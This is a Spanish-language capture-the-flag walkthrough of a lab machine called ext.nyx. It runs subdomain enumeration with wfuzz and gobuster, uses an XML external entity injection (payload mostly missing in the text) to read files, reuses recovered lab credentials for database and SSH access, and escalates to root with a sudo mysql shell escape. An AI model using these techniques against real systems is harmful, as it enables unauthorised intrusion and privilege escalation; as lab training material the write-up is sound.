Hacemos el reconocimiento con nmap:
{{pasted_image_20230926104210.png|}}
Y en el puerto 80 vemos que no hay nada aparentemente:
{{pasted_image_20230926104349.png|}}
Pero si vemos el código fuente nos encontramos con esto:
{{pasted_image_20230926104410.png|}}
Añadimos el dominio en el /etc/host:
{{pasted_image_20230926104535.png|}}
Y hacemos búsqueda de subdominios:
wfuzz -c -t 200 --hl 75 -w subdomains-top1million-110000.txt -H "Host: FUZZ.ext.nyx" http://ext.nyx
O con gobuster:
gobuster vhost -u http://ext.nyx -w subdomains-top1million-110000.txt | grep -v '400'
Y tenemos el subdominio administrator:
{{pasted_image_20230926105521.png|}}
Lo añadimos al /etc/hosts y deberíamos poder acceder a él desde el navegador:
{{pasted_image_20230926105704.png|}}
{{pasted_image_20230926105714.png|}}
Ponemos unas credenciales aleatorias e interceptamos con burp suite la petición, donde vemos que poder estar ante un XML External Entity:
{{pasted_image_20230926105854.png|}}
Le ponemos el siguiente payload basándonos en el que viene por defecto:
]>
&prueba;
1234
Vemos que hay un usuario llamado mysql:
{{pasted_image_20230926124527.png|}}
Por lo que podemos intentar apuntar contra el mysql.history:
]>
&prueba;
1234
{{pasted_image_20230926124604.png|}}
Y tenemos las siguientes credenciales:
root:r00tt00rDB
Iniciamos sesión con estas credenciales y vemos que funciona bien:
{{pasted_image_20230926125018.png|}}
{{pasted_image_20230926125032.png|}}
Y vemos la contraseña del usuario admin:
{{pasted_image_20230926125108.png|}}
admin:4dminDBS3cur3P4ssw0rd123
Y con esta contraseña entramos correctamente por ssh:
{{pasted_image_20230926125555.png|}}
Y si ejecutamos el comando sudo -l vemos cómo podemos ejecutar como sudo mysql:
{{pasted_image_20230926125756.png|}}
Buscamos en gtfobins como explotar esto y lo hacemos, pero nos pedirá que pongamos la contraseña de la base de datos nuevamente:
sudo /usr/bin/mysql -e '\! /bin/sh' -p
r00tt00rDB
{{pasted_image_20230926125910.png|}}